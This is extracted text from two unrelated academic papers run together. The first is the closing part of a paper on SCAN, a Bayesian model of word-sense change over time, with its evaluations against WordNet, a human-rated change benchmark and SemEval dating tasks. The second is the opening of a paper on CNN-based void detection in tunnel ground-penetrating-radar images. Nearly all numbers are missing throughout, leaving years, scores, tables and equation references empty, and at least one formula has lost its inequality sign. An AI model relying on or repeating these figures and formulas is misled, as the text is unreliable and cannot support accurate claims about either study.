columns show the ten most highly associated words for each time interval for the period between and (ordered by decreasing probability). we highlight how four terms characteristic of the sense develop over time (see {water, steam, plant, nuclear} in the figure). three senses emerge: the institutional power (col- ors gray/ , brown/ , pink/ , orange/ in the figure), mental power (yellow/ , lightgreen/ , darkgreen/ ), and power as supply of energy (violet/ ). the latter is an example of a “sense birth” (mitra et al., ): the sense was hardly present before the mid- th century. this is corroborated by the oed which dates the sense to , whereas the oed contains references to the remaining senses for the whole modeled time period, as predicted by our model. - - - - - - - - - - - - - - - - . . . pr ec is io n scan scan-not t t figure : precision results for the scan and scan-not models on the wordnet-based novel sense detection (exper- iment ). results are shown for a selection of reference times (t ) and focus times (t ). similar trends of meaning change emerge for transport (figure bottom left). the bot- tom right plot shows the sense development for the word bank. although the well-known senses river bank (brown/ , lightgreen/ ) and monetary institu- tion (rest) emerge clearly, the overall sense pattern appears comparatively stable across intervals indi- cating that the meaning of the word has not changed much over time. besides tracking sense prevalence over time, our model can also detect changes within individual senses. because we are interested in tracking se- mantically stable senses, we fixed the precision pa- rameter κψ to a high value, to discourage too much variance within each sense. figure illustrates how the energy sense of the word power (violet/ in figure ) has changed over time. characteristic terms for a given sense are highlighted in bold face. for example, the term “water” is initially prevalent, while the term “steam” rises in prevalence towards the middle of the modeled period, and is superseded by the terms “plant” and “nuclear” towards the end. experiment : novel sense detection in this section and the next we will explicitly eval- uate the temporal representations (i.e., probability distributions) induced by our model, and discuss its performance in the context of previous work. large-scale evaluation of meaning change is noto- riously difficult, and many evaluations are based on limited hand-annotated goldstandard data sets. mi- tra et al. ( ), however, bypass this issue by eval- uating the output of their system against wordnet (fellbaum, ). here, we consider their auto- matic evaluation of sense-births, i.e., the emergence of novel senses. we assume that novel senses are detected at a focus time t whilst being compared to a reference time t . wordnet is used to confirm that the proposed novel sense is indeed distinct from all other induced senses for a given word. method mitra et al.’s ( ) evaluation method presupposes a system which is able to detect senses for a set of target words and identify which ones are novel. our model does not automatically yield nov- elty scores for the induced senses. however, cook et al. ( ) propose several ways to perform this task post-hoc. we use their relevance score, which is based on the intuition that keywords (or collo- cations) which characterize the difference of a fo- cus corpus from a reference corpus are indicative of word sense novelty. 
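this wordnet check can be pictured with the sketch below, which maps each induced sense (its most probable words) to the synset of the target word with the largest lemma/gloss overlap and then tests whether the candidate's synset is distinct from the synsets of all other senses. the overlap function here is a simplifying assumption rather than the exact mapper of mitra et al., and the example requires nltk's wordnet data to be installed.

```python
from nltk.corpus import wordnet as wn   # assumes the wordnet corpus is downloaded

def best_synset(sense_words, target):
    """Map an induced sense (its top words) to the target's WordNet synset
    whose lemmas and gloss share the most words with the sense."""
    def overlap(syn):
        bag = set(syn.definition().lower().split())
        bag.update(l.lower() for l in syn.lemma_names())
        return len(bag & set(sense_words))
    synsets = wn.synsets(target)
    return max(synsets, key=overlap) if synsets else None

def confirmed_sense_birth(candidate, other_senses, target):
    """A candidate novel sense counts as a sense birth only if its mapped
    synset differs from the synsets mapped to every other induced sense."""
    novel = best_synset(candidate, target)
    others = {best_synset(s, target) for s in other_senses}
    return novel is not None and novel not in others

print(confirmed_sense_birth(["cursor", "click", "usb", "screen"],
                            [["cheese", "tail", "rat", "trap"]], "mouse"))
```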
we identify keywords for a focus corpus with re- spect to a reference corpus using kilgarriff’s ( ) method which is based on smoothed relative fre- quencies. the novelty of an induced sense s can be then defined in terms of the aggregate keyword probabilities given that sense (and focus time of in- terest): rel(s) = ∑ w∈w p(w|s,t ). ( ) where w is a keyword list and t the focus time. cook et al. ( ) suggest a straightforward extrap- olation from sense novelty to word novelty: rel(c) = max s rel(s), ( ) we set the smoothing parameter to n = , and like cook et al. ( ) retrieve the top keywords. t = – t = – union soviet united american union european war civil military people liberty dos system window disk pc operate program run computer de dos entertainment television industry program time business people world president entertainment company station radio station television local program network space tv broadcast air t = – t = – environmental supra note law protection id agency impact policy factor federal users computer window information software system wireless drive web building available virtual reality virtual computer center experience week community separation increase disk hard disk drive program computer file store ram business embolden table : example target terms (left) with novel senses (right) as identified by scan in focus corpus t (when compared against reference corpus t ). top: terms used in novel sense detection study (experiment ). bottom: terms from the gulordava and baroni ( ) gold standard (experiment ). where rel(c) is the highest novelty score assigned to any of the target word’s senses. a high rel(c) score suggests that a word has undergone meaning change. we obtained candidate terms and their associ- ated novel senses from the date corpus, using the relevance metric described above. the novel senses from the focus period and all senses induced for the reference period, except for the one corre- sponding to the novel sense, were passed on to mitra et al.’s ( ) wordnet-based evaluator which pro- ceeds as follows. firstly, each induced sense s is mapped to the wordnet synset u with the maximum overlap: synset(s) = arg max u overlap(s,u). ( ) next, a predicted novel sense n is deemed truly novel if its mapped synset is distinct from any synset mapped to a different induced sense: ∀s′synset(s′) = synset(n). ( ) finally, overall precision is calculated as the frac- tion of sense-births confirmed by wordnet over all birth-candidates proposed by the model. like mitra et al. ( ) we only report results on target words for which all induced senses could be successfully mapped to a synset. models and parameters we obtained the broad set of target words used for the task-based evalua- tion (in section ) and trained models on the date corpus. we set the number of senses k = fol- lowing mitra et al. ( ) who note that the word- net mapper works best for words with a small num- ber of senses, and the time intervals to ∆t = as in experiment . we identified words with highest novelty score (equation ( )) as sense birth candidates. we compared the performance of the full scan model against scan-not which learns senses independently for time intervals. we trained both models on the same data with identical pa- rameters. for scan-not, we must post-hoc iden- tify corresponding senses across time intervals. 
we used the jensen-shannon divergence between the reference- and focus-time specific word distribu- tions js(p(w|s,t )||p(w|s,t )) and assigned each focus-time sense to the sense with smallest diver- gence at reference time. results figure shows the performance of our models on the task of sense birth detection. scan performs better than scan-not, underscoring the importance of joint modeling of senses across time slices and incorporation of temporal dynamics. our accuracy scores are in the same ballpark as mitra et al. ( , ). note, however that the scores are not directly comparable due to differences in train- ing corpora, focus and reference times, and candi- date words. mitra et al. ( ) use the larger google syntactic n-gram corpus, as well as richer linguis- tic information in terms of syntactic dependencies. we show that our model which does not rely on syntactic annotations performs competitively even when trained on smaller data. table (top) displays examples of words assigned highest novelty scores for the reference period – and focus pe- riod – . this threshold was tuned on one reference-focus time pair. experiment : word meaning change in this experiment we evaluate whether model in- duced temporal word representations capture per- ceived word novelty. specifically, we adopt the eval- uation framework (and dataset) introduced in gulor- dava and baroni ( ) and discussed below. method gulordava and baroni ( ) do not model word senses directly; instead they obtain dis- tributional representations of words from the google books (bigram) data for two time slices, namely the s (reference corpus) and s (focus cor- pus). to detect change in meaning, they measure cosine similarity between the vector representations of a target word in the reference and focus corpus. it is assumed that low similarity indicates signifi- cant meaning change. to evaluate the output of their system, they created a test set of target words (nouns, verbs, and adjectives), and asked five anno- tators to rate each word with respect to its degree of meaning change between the s and the s. the annotators used a -point ordinal scale ( : no change, : almost no change, : somewhat change, : changed significantly). words were subsequently ranked according to the mean rating given by the annotators. inter-annotator agreement on the novel sense detection task was . (pairwise pearson cor- relation) and can be regarded as an upper bound on model performance. models and parameters we trained models for all words in gulordava and baroni’s ( ) gold- standard. we used the date subcorpus cover- ing years through partitioned by decade (∆t = ). the first and last time interval were defined as reference and focus time, respec- tively (t = – , t = – ). as in ex- periment , a novelty score was assigned to each target word (using equation ( )). we computed spearman’s ρ rank correlations between gold stan- dard and model rankings (gulordava and baroni, ). we trained scan models setting the num- ber of senses to k = . we also trained scan-not models with identical parameters. we report results averaged over five independent parameter estimates. finally, as in gulordava and baroni ( ) we com- pare against a frequency baseline which ranks words we thank kristina gulordava for sharing their evaluation data set of target words and human judgments. system corpus spearman’s ρ gulordava ( ) google . scan date . scan-not date . frequency baseline date . 
table : spearman's ρ rank correlations between system novelty rankings and the human-produced ratings. all correlations are statistically significant (p < . ). results for scan and scan-not are averages over five trained models.

system               corpus   spearman's ρ
gulordava ( )       google   .
scan                 date     .
scan-not             date     .
frequency baseline   date     .

results the results of this evaluation are shown in table . as can be seen, scan outperforms scan-not and the frequency baseline. for reference, we also report the correlation coefficient obtained in gulordava and baroni ( ), but emphasize that the scores are not directly comparable due to differences in training data: gulordava and baroni ( ) use the google bigrams corpus (which is much larger compared to date). table (bottom) displays examples of words which achieved the highest novelty scores in this evaluation, and their associated novel senses.

experiment : task-based evaluation
in the previous sections we demonstrated how scan captures meaning change between two periods. in this section, we assess our model on an extrinsic task which relies on meaning representations spanning several time slices. we quantitatively evaluate our model on the semeval- benchmark datasets released as part of the diachronic text evaluation exercise (popescu and strapparava, ; dte). in the following we first present the dte subtasks, and then move on to describe our training data, parameter settings, and the systems used for comparison with our model.

semeval dte tasks diachronic text evaluation is an umbrella term used by the semeval- organizers for three subtasks aiming to assess the performance of computational methods used to identify when a piece of text was written. a similar problem is tackled in chambers ( ), who labels documents with time stamps whilst focusing on explicit time expressions and their discriminatory power. the semeval data consists of news snippets, which range between a few words and multiple sentences. a set of training snippets, as well as gold-annotated development and test datasets, are provided. dte subtasks and involve temporal classification: given a news snippet and a set of non-overlapping time intervals covering the period through , the system's task is to select the interval corresponding to the snippet's year of origin. temporal intervals are consecutive and constructed such that the correct interval is centered around the actual year of origin. for both tasks, temporal intervals are created at three levels of granularity (fine, medium, and coarse).

subtask involves snippets which contain an explicit cue for the time of origin. the presence of a temporal cue was determined by the organizers by checking the entities' informativeness in external resources. consider the example below:

( ) president de gaulle favors an independent european nuclear striking force [...]

the mentions of french president de gaulle and nuclear warfare suggest that the snippet was written after the mid- s, and indeed it was published in . a hypothetical system would then have to decide amongst the following classes:

{ – , – , ..., – , ..., – }
{ – , – , ..., – , ..., – }
{ – , – , ..., – , ..., – }

the first set of classes corresponds to fine-grained intervals of years, the second set to medium-grained intervals of years, and the third set to coarse-grained intervals of years. for the snippet in example ( ), classes – , – , and – are the correct ones.
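to make the interval classes concrete, the sketch below generates contiguous intervals of a given width with the correct class centered on a snippet's true year of origin, as in the dte setup described above; the interval width, the number of intervals per side, and the example year are illustrative and not taken from the semeval data.

```python
def centered_intervals(true_year, width, n_each_side=3):
    """contiguous, non-overlapping intervals of a fixed width, with the correct class
    centered on the true year of origin (illustrative reconstruction of the dte setup)."""
    start = true_year - width // 2 - n_each_side * width
    return [(start + i * width, start + i * width + width - 1)
            for i in range(2 * n_each_side + 1)]

# example: 6-year granularity around an arbitrary year; the gold class is the middle interval.
intervals = centered_intervals(1900, width=6)
gold = intervals[len(intervals) // 2]   # (1897, 1902), which contains 1900
```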
subtask involves temporal classification of snippets which lack explicit temporal cues but contain implicit ones, e.g., as indicated by lexical choice or spelling. the snippet in example ( ) was published in , and the spelling of to-day, which was common up to the early th century, is an implicit cue:

( ) the local wheat market was not quite so strong to-day as yesterday.

analogously to subtask , systems must select the right temporal interval from a set of contiguous time intervals of differing granularity. for this task, which is admittedly harder, the levels of temporal granularity are coarser, corresponding to -year, -year and -year intervals.

participating semeval systems we compared our model against three other systems which participated in the semeval task. ambra (zampieri et al., ) adopts a learning-to-rank modeling approach and uses several stylistic, grammatical, and lexical features. ixa (salaberri et al., ) uses a combination of approaches to determine the period of time in which a piece of news was written. this involves searching for specific mentions of time within the text, searching for named entities present in the text and then establishing their reference time by linking these to wikipedia, using google n-grams, and linguistic features indicative of language change. finally, ucd (szymanski and lynch, ) employs svms for classification using a variety of informative features (e.g., pos-tag n-grams, syntactic phrases), which were optimized for the task through automatic feature selection. (we do not report results for the system usaar, which achieved close to % accuracy by searching for the test snippets on the web, without performing any temporal inference.)

models and parameters we trained our model for individual words and obtained representations of their meaning for different points in time. our set of target words consisted of all nouns which occurred in the development datasets for dte subtasks and , as well as all verbs which occurred at least twice in this dataset. after removing infrequent words we were left with words (out of , ) which we used in this evaluation. target words were not optimized with respect to the test data in any way; it is thus reasonable to expect better performance with an adjusted set of words. we set the model time interval to ∆t = years and the number of senses per word to k = . we also evaluated scan-not, the stripped-down version of scan, with identical parameters.

both scan and scan-not predict the time of origin for a test snippet as follows. we first detect mentions of target words in the snippet. then, for each mention c we construct a document, akin to the training documents, consisting of c and its context w, the ± words surrounding c. given {c,w}, we approximate a distribution over time intervals as:

p^(c)(t|w) ∝ p^(c)(w|t) × p^(c)(t) ( )

where the superscript (c) indicates parameters from the word-specific model; we marginalize over senses and assume a uniform distribution over time slices p^(c)(t). finally, we combine the word-wise predictions into a final distribution p(t) = ∏_c p^(c)(t|w), and predict the time t with the highest probability.
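the combination of word-wise predictions described above amounts to multiplying the per-mention distributions and taking the most probable interval; a minimal sketch (the function name and the log-space implementation are our own):

```python
import numpy as np

def predict_time(per_mention_dists):
    """combine per-mention distributions p(t | c, w) into a single prediction.

    per_mention_dists: list of 1-d arrays, one per detected target-word mention,
    all defined over the same ordered set of time intervals.
    """
    log_p = np.zeros(len(per_mention_dists[0]), dtype=float)
    for dist in per_mention_dists:
        log_p += np.log(np.asarray(dist, dtype=float) + 1e-12)  # product in log space
    return int(np.argmax(log_p))  # index of the most probable time interval
```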
supervised classification we also apply our model in a supervised setting, i.e., by extracting features for classifier prediction. specifically, we trained a multiclass svm (chang and lin, ) on the training data provided by the semeval organizers (for dte tasks and ). for each observed word within each snippet, we added as a feature its most likely sense k given t, the true time of origin:

arg max_k p^(c)(k|t). ( )

we also trained a multiclass svm which uses character n-gram (n ∈ { , , }) features in addition to the model features. szymanski and lynch ( ) identified character n-grams as the most predictive feature for temporal text classification using svms. their system (ucd) achieved the best published scores in dte subtask . following their approach, we included all n-grams that were observed more than times in the dte training data.

results we employed two evaluation measures proposed by the dte organizers: precision p, i.e., the percentage of times a system has predicted the correct time period, and accuracy acc, which is more lenient and penalizes system predictions in proportion to their distance from the true interval. we compute the p and acc scores for our models using the evaluation script provided by the semeval organizers.

table : results on diachronic text evaluation tasks and for a random baseline, our scan model, its stripped-down version without igmrfs (scan-not), the semeval submissions (ixa, ambra and ucd), and svms trained with scan features (svm scan) and with additional character n-gram features (svm scan+ngram). results are shown for three levels of granularity, a strict precision measure p, and a distance-discounting measure acc.

table summarizes our results for dte subtasks and . we compare scan against a baseline which selects a time interval at random, averaged over five runs. (we recomputed the baseline scores for subtasks and due to inconsistencies in the results provided by the dte organizers.) we also show results for a stripped-down version of our model without the igmrfs (scan-not) and for the systems which participated in semeval.

for subtask , the two versions of scan outperform all semeval systems across the board. scan-not occasionally outperforms scan in the strict precision metric; however, the full scan model consistently achieves better accuracy scores, which are more representative since they factor in the proximity of the prediction to the true value. in subtask , the ucd and svm scan+ngram systems perform comparably. they both use svms for the classification task; however, our own model employs a less expressive feature set based on scan and character n-grams, and does not take advantage of feature selection, which would presumably enhance performance. with the exception of ambra, all other participating systems used external resources (such as wikipedia and google n-grams); it is thus fair to assume they had access to at least as much training data as our scan model. consequently, the gap in performance cannot solely be attributed to a difference in the size of the training data.

we also observe that ixa and scan, given identical granularity, perform better on subtask , while ambra and our own svm-based systems exhibit the opposite trend. the ixa system uses a combination of knowledge sources in order to determine when a piece of news was written, including explicit mentions of temporal expressions within the text, named entities, and linked information to those named entities from wikipedia.
ambra on the other hand exploits more shallow stylistic, grammat- ical and lexical features within the learning-to-rank paradigm. an interesting direction for future work would be to investigate which features are most ap- propriate for different dte tasks. overall, it is en- couraging to see that the generic temporal word rep- resentations inferred by scan lead to competitively performing models on both temporal classification tasks without any explicit tuning. conclusion in this paper we introduced scan, a dynamic bayesian model of diachronic meaning change. our model learns a coherent set of co-dependent time-specific senses for individual words and their prevalence. evaluation of the model’s output showed that the learnt representations reflect (a) dif- ferent senses of ambiguous words (b) different kinds of meaning change (such as new senses being estab- lished), and (c) connotational changes within senses. scan departs from previous work in that it models temporal dynamics explicitly. we demonstrated that this feature yields more general semantic represen- tations as indicated by predictive loglikelihood and a variety of extrinsic evaluations. we also experi- mentally evaluated scan on novel sense detection and the semeval dte task, where it performed on par with the best published results, without any ex- tensive feature engineering or task specific tuning. we conclude by discussing limitations of our model and directions for future work. in our exper- iments we fix the number of senses k for all words across all time periods. although this approach did not harm performance (even in case of semeval where we handled more than target concepts), it is at odds with the fact that words vary in their degree of ambiguity, and that word senses continu- ously appear and disappear. a non-parametric ver- sion of our model would infer an appropriate number of senses from the data, individually for each time period. also note that in our experiments we used context as a bag of words. it would be interesting to explore more systematically how different kinds of contexts (e.g., named entities, multiword expres- sions, verbs vs. nouns) influence the representations the model learns. furthermore, while scan cap- tures the temporal dynamics of word senses, it can- not do so for words themselves. put differently, the model cannot identify whether a new word is used which did not exist before, or that a word ceased to exist after a specific point in time. a model internal way of detecting word (dis)appearance would be de- sirable, especially since new terms are continuously being introduced thanks to popular culture and vari- ous new media sources. in the future, we would like to apply our model to different text genres and levels of temporal granular- ity. for example, we could work with twitter data, an increasingly popular source for opinion tracking, and use our model to identify short-term changes in word meanings or connotations. acknowledgments we are grateful to the anonymous reviewers whose feedback helped to substantially improve the present paper. we thank charles sutton and iain murray for helpful discussions, and acknowledge the support of epsrc through project grant ep/i / . references aitchison, jean. . language change: progress or decay?. cambridge approaches to linguis- tics. cambridge university press. biemann, chris. . chinese whispers - an effi- cient graph clustering algorithm and its appli- cation to natural language processing problems. 
in proceedings of textgraphs: the st workshop on graph based methods for natural language processing. new york city, ny, usa, pages – . bird, steven, ewan klein, and edward loper. . natural language processing with python. o’reilly media, inc., st edition. blei, david m. and john d. lafferty. a. cor- related topic models. in advances in neural in- formation processing systems , vancouver, bc, canada, pages – . blei, david m. and john d. lafferty. b. dy- namic topic models. in proceedings of the rd international conference on machine learning. pittsburgh, pa, usa, pages – . brody, samuel and mirella lapata. . bayesian word sense induction. in proceedings of the th conference of the european chapter of the acl. athens, greece, pages – . chambers, nathanael. . labeling documents with timestamps: learning from their time ex- pressions. in proceedings of the th annual meeting of the association for computational linguistics. jeju island, korea, pages – . chang, chih-chung and chih-jen lin. . libsvm: a library for support vector ma- chines. acm transactions on intelligent sys- tems and technology : : – : . software available at http://www.csie.ntu.edu. tw/˜cjlin/libsvm. chen, jianfei, jun zhu, zi wang, xun zheng, and bo zhang. . scalable inference for logistic- normal topic models. in advances in neural in- formation processing systems, lake tahoe, nv, usa, pages – . cook, paul, jey han lau, diana mccarthy, and timothy baldwin. . novel word-sense iden- tification. in proceedings of the th interna- tional conference on computational linguistics: technical papers. dublin, ireland, pages – . cook, paul and suzanne stevenson. . automat- ically identifying changes in the semantic orien- tation of words. in proceedings of the seventh international conference on language resources and evaluation. valletta, malta, pages – . davies, mark. . the corpus of historical american english: million words, - . available online at http://corpus. byu.edu/coha/. diller, hans-jürgen, hendrik de smet, and jukka tyrkkö. . a european database of descriptors of english electronic texts. the european english messenger ( ): – . fellbaum, christiane. . wordnet: an electronic lexical database. bradford books. groenewald, pieter c. n. and lucky mokgatlhe. . bayesian computation for logistic regres- sion. computational statistics & data analysis ( ): – . gulordava, kristina and marco baroni. . a dis- tributional similarity approach to the detection of semantic change in the google books ngram corpus. in proceedings of the workshop on geo- metrical models of natural language semantics. edinburgh, scotland, pages – . kilgarriff, adam. . simple maths for keywords. in proceedings of the corpus linguistics confer- ence. kim, yoon, yi-i chiu, kentaro hanaki, darshan hegde, and slav petrov. . temporal anal- ysis of language through neural language mod- els. in proceedings of the acl workshop on language technologies and computational so- cial science. baltimore, md, usa, pages – . kulkarni, vivek, rami al-rfou, bryan perozzi, and steven skiena. . statistically significant de- tection of linguistic change. in proceedings of the th international conference on world wide web. geneva, switzerland, pages – . lau, han jey, paul cook, diana mccarthy, span- dana gella, and timothy baldwin. . learn- ing word sense distributions, detecting unat- tested senses and identifying novel senses us- ing topic models. in proceedings of the nd annual meeting of the association for compu- tational linguistics. baltimore, md, usa, pages – . 
lau, jey han, paul cook, diana mccarthy, david newman, and timothy baldwin. . word sense induction for novel sense detection. in proceedings of the th conference of the eu- ropean chapter of the association for computa- tional linguistics. avignon, france, pages – . mcmahon, april m.s. . understanding lan- guage change. cambridge university press. mihalcea, rada and vivi nastase. . word epoch disambiguation: finding how words change over time. in proceedings of the th http://www.csie.ntu.edu.tw/~cjlin/libsvm http://www.csie.ntu.edu.tw/~cjlin/libsvm http://corpus.byu.edu/coha/ http://corpus.byu.edu/coha/ annual meeting of the association for computa- tional linguistics. jeju island, korea, pages – . mimno, david, hanna wallach, and andrew mc- callum. . gibbs sampling for logistic nor- mal topic models with graph-based priors. in nips workshop on analyzing graphs. vancouver, canada. mitra, sunny, ritwik mitra, suman kalyan maity, martin riedl, chris biemann, pawan goyal, and animesh mukherjee. . an automatic ap- proach to identify word sense changes in text me- dia across timescales. natural language engi- neering : – . mitra, sunny, ritwik mitra, martin riedl, chris biemann, animesh mukherjee, and pawan goyal. . that’s sick dude!: automatic identification of word sense change across different timescales. in proceedings of the nd annual meeting of the association for computational linguistics. balti- more, md, usa, pages – . ó séaghdha, diarmuid. . latent variable mod- els of selectional preference. in proceedings of the th annual meeting of the association for computational linguistics. uppsala, sweden, pages – . popescu, octavian and carlo strapparava. . be- hind the times: detecting epoch changes using large corpora. in proceedings of the sixth inter- national joint conference on natural language processing. nagoya, japan, pages – . popescu, octavian and carlo strapparava. . se- meval , task : diachronic text evaluation. in proceedings of the th international workshop on semantic evaluation (semeval ). denver, co, usa, pages – . ritter, alan, mausam, and oren etzioni. . a latent dirichlet allocation method for selec- tional preferences. in proceedings of the th annual meeting of the association for computa- tional linguistics. uppsala, sweden, pages – . rue, håvard and leonhard held. . gaussian markov random fields: theory and applica- tions. chapman & hall/crc monographs on statistics & applied probability. crc press. sagi, eyal, stefan kaufmann, and brady clark. . semantic density analysis: comparing word meaning across time and phonetic space. in proceedings of the workshop on geometrical models of natural language semantics. athens, greece, pages – . salaberri, haritz, iker salaberri, olatz arregi, and beñat zapirain. . ixagroupehudiac: a multiple approach system towards the di- achronic evaluation of texts. in proceedings of the th international workshop on semantic eval- uation (semeval ). denver, co, usa, pages – . stevenson, angus, editor. . the oxford english dictionary. oxford university press, third edi- tion. szymanski, terrence and gerard lynch. . ucd: diachronic text classification with char- acter, word, and syntactic n-grams. in pro- ceedings of the th international workshop on se- mantic evaluation (semeval ). denver, co, usa, pages – . tahmasebi, nina, thomas risse, and stefan di- etze. . towards automatic language evolu- tion tracking, a study on word sense tracking. in proceedings of the joint workshop on knowl- edge evolution and ontology dynamics (evodyn ). 
bonn, germany. wijaya, derry tanti and reyyan yeniterzi. . understanding semantic change of words over centuries. in proceedings of the inter- national workshop on detecting and exploiting cultural diversity on the social web. glasgow, scotland, uk, pages – . zampieri, marcos, alina maria ciobanu, vlad nic- ulae, and liviu p. dinu. . ambra: a rank- ing approach to temporal text classification. in proceedings of the th international workshop on semantic evaluation (semeval ). denver, co, usa, pages – . international journal of advanced network, monitoring and controls volume , no. , doi: . /ijanmc- - research on the tunnel geological radar image flaw detection based on cnn li he school of computer science and engineering xi’an technological university xi’an, china e-mail: @qq.com wang yubian department of railway transportation control belarusian state university of transport , kirova street, gomel, republic of belarus e-mail: alika_wang@mail.ru abstract—tunnel geological radar image has been widely used in tunnel engineering quality detection for its advantages of fast, nondestructive, continuous detection, real-time imaging, intuitive data processing and high detection accuracy. however, the traditional defect detection method, which is judged by surveyors visually, consumes energy. in order to detect the quality of tunnel engineering accurately and quickly, an improved method of void defect detection based on faster rcnn (regional convolutional neural network) is proposed in depth learning. the image data of the tunnel geological radar is collected for annotation, which fills the blank of the defect data set in the tunnel engineering. through the method of this paper proposed, the feature extraction is optimized to improve the performance of the detection model, and the detection accuracy of the model is verified by expert knowledge. keywords-tunnel geological; radar image; flaw detection; cnn i. introduction there are a large number of tunnel projects in the construction project. the quality defects of the tunnel may affect the construction schedule, increase the engineering cost, damage the mechanical equipment and even endanger the lives of the constructor. geological radar detection method[ - ] is the mainstream method of tunnel lining detection at present, and has excellent performance in the detection of reinforcement and arch spacing, plain concrete structure, etc.[ ]. however, the traditional survey situation is that the site construction surveyors scan the survey images generated by radar equipment one by one according to their expert knowledge. this traditional method has a large workload, a large human factor, and a certain rate of omission and error. in recent years, with the continuous improvement of gpu, the field of deep learning is booming. in , hinton[ ] and other researcher proposed the concept of deep learning, using convolutional neural network (cnn) to learn features from data. in , in the imagenet image classification competition, alex krizhevsky's team proposed the deep convolutional neural network alexnet for the first time. alexnet won the champion with an accuracy rate of . % higher than the second place, which made people have a further understanding of the application of convolutional neural network in visual tasks. girshick r proposed the regional convolutional neural network (rcnn) model, which uses the selective search method to select candidate regions and uses multiple international journal of advanced network, monitoring and controls volume , no. 
support vector machines to classify features, thus achieving target detection. in , girshick r proposed fast rcnn[ ], an improved version of rcnn that adopts roi pooling so that the computation-heavy parts are shared, improving the efficiency of the whole model. later, ren et al. improved on the original network again, introduced an rpn layer, and designed the faster rcnn model[ ] to address the slow extraction of candidate regions, which achieved good results. compared with hand-crafted features, features extracted by a convolutional neural network are more robust and carry stronger semantic information, and great achievements have been made in computer vision fields such as face recognition[ - ], target detection, and speech recognition[ - ].

this paper selects the faster rcnn network as the basic algorithm framework for tunnel gpr (ground penetrating radar) detection, and the framework of the faster rcnn network is introduced. however, if the original faster rcnn model is applied directly to tunnel gpr detection in a real scene, there may be two disadvantages: ) the data sets collected on site for training are relatively small, which may lead to incomplete learning and overfitting[ ]. ) there are many interference factors in the tunnel, resulting in complex image features for the defects. at the same time, the radar images are judged manually by field surveyors based on experience, and there is no uniform standard, so image sharpness varies considerably. this causes the rpn to produce a larger negative sample space, making the network model difficult to converge[ ]. for these reasons, this paper proposes an improved faster rcnn model: the original data set is expanded through data augmentation[ ], ga-rpn[ ] is incorporated to improve target detection, and the giou evaluation index is used to optimize bounding-box regression[ ], in order to overcome the above shortcomings and further improve the accuracy of tunnel geological radar image detection.

ii. key technologies and equipment
as a relatively mature geophysical prospecting method, the geological radar method has the advantages of high resolution, fast detection speed, non-destructiveness and radar image visualization, and has become the most important method for tunnel lining quality detection. defects of the tunnel lining, such as local un-compactness, voids, insufficient thickness and missing reinforcement, produce obvious anomalous responses.

a. technical principle
different defects have different reflections in radar images. the electromagnetic waves emitted by gpr are reflected and refracted at the surface of media with different dielectric constants[ ]. the dielectric constants of common materials are shown in table i below.

table i. dielectric constants of common materials
material       dielectric constant   velocity (mm/ns)
atmosphere
water
concrete       –                     –
sand (dry)     –                     –
sand (wet)     –                     –
pitch          –                     –

reflection and refraction conform to the law of reflection and refraction. the energy of the reflected and refracted waves depends on the reflection coefficient r and the refraction coefficient t:

r = (√ε₁ − √ε₂) / (√ε₁ + √ε₂) ( )

in the above equation, ε₁ and ε₂ are the relative permittivities of the upper and lower media at the interface, respectively.
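a quick numerical sketch of this relation (the permittivity values below are illustrative, not the ones from table i):

```python
import math

def reflection_coefficient(eps_upper, eps_lower):
    """reflection coefficient at an interface between media with relative
    permittivities eps_upper (upper medium) and eps_lower (lower medium)."""
    return ((math.sqrt(eps_upper) - math.sqrt(eps_lower)) /
            (math.sqrt(eps_upper) + math.sqrt(eps_lower)))

# concrete over air (a void) gives a positive coefficient, air over concrete a negative one,
# which is why a void produces paired peaks of opposite sign in the radargram.
print(reflection_coefficient(9.0, 1.0))   # concrete -> air, positive
print(reflection_coefficient(1.0, 9.0))   # air -> concrete, negative
```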
according to formula ( ), when the electromagnetic wave propagates to the interface with dielectric constant difference, the reflected electromagnetic wave energy will change, which is reflected in the radar image as positive and anti-peak anomalies. the defects in lining such as local un-compaction, voidage, insufficient thickness and lack of reinforcement have obvious dielectric differences with concrete, which provide a good geophysical foundation for the application of gpr. b. equipment the equipment of detection equipment of gpr system in the project is shown in figure . figure . gpr system detection equipment geological ground penetrating radar method is the use of high frequency electromagnetic wave transmitting antenna will be in the form of a pulse in the concrete surface emission to concrete, the concrete interface reflection and defects return to the surface, by the receiving antenna to receive the echo signal, the treatment of radar system, radar image, through the analysis of the radar image processing, the interpretation of the data on the basis of this, so as to achieve quality nondestructive testing of lining. its detection principle is shown in figure . figure . principles of geological radar detection international journal of advanced network, monitoring and controls volume , no. , c. the radar imaging profile profiles of gpr images are usually recorded in the form of pulse reflected waves, or in the form of gray or color profiles. in this way, the in-phase axis or the iso-gray line can be used to represent the underground reflector or the target body. on the waveform recording chart, waveforms are recorded in the vertical direction of the survey line at all measurement points, forming the radar imaging profile. in the tunnel lining detection, the voids mainly appear between the inner lining, the second lining and the surface layer. due to the large dielectric difference between the void and surrounding media, when the electromagnetic wave propagates between concrete and atmosphere, air and surrounding rock, it will generate two strong reflections at the upper and lower interfaces. because the electromagnetic wave in the air attenuation is small, and the concrete and air dielectric difference is large, so in the void to produce a strong multiple reflections, electromagnetic wave in the air medium propagation frequency is relatively high. at the upper interface of voids, the electromagnetic wave goes from concrete to the air medium. according to the law of reflection (formula ), the reflection coefficient is positive, showing a negative wave peak. at the gap interface, the reflection coefficient of electromagnetic wave from air to concrete medium is negative, showing a positive wave peak. the picture is as shown in figure . in the image, white is the strongest color of positive reflection and black is the strongest color of negative reflection. in theory, there is a gap defect and the radar image shows two sets of reflected signals. in the actual survey, the second reflection signal may be lost due to signal interference. figure . gpr image of tunnel ejection iii. convolutional neural networks convolutional neural networks (cnn) can use local operations to abstract the representations in a hierarchical way in image recognition [ ]. two key design ideas have driven the success of convolution architecture in computer vision. first, cnn uses the d structure of the image, and the pixels in adjacent areas are usually highly correlated. 
therefore, instead of using one-to-one connections between all pixel units (as most neural networks do), a cnn can use local connections in groups. second, the cnn architecture relies on feature sharing, so each channel (that is, each output feature map) is generated by convolution with the same filter at all locations. deep learning methods for object detection with convolutional neural networks are mainly divided into single-stage (e.g., ssd, yolo) and two-stage (e.g., the rcnn series). single-stage methods generate detections directly from the picture in one pass; two-stage methods extract proposals first and then refine them in a second step. compared with two-stage methods, single-stage methods are faster but less precise. in this paper, the two-stage faster rcnn is used because of its higher accuracy[ ].

this paper adopts faster rcnn as the basic framework, as shown in figure .

figure . structure chart of faster rcnn (input: tunnel geological radar image; conv layers produce feature maps, the region proposal network produces proposals, followed by roi pooling and the classifier).

in fact, faster rcnn can be divided into four main components:
) convolutional layers. they are used to extract features from the gpr image. the input is the whole image and the output is the set of extracted features, called feature maps.
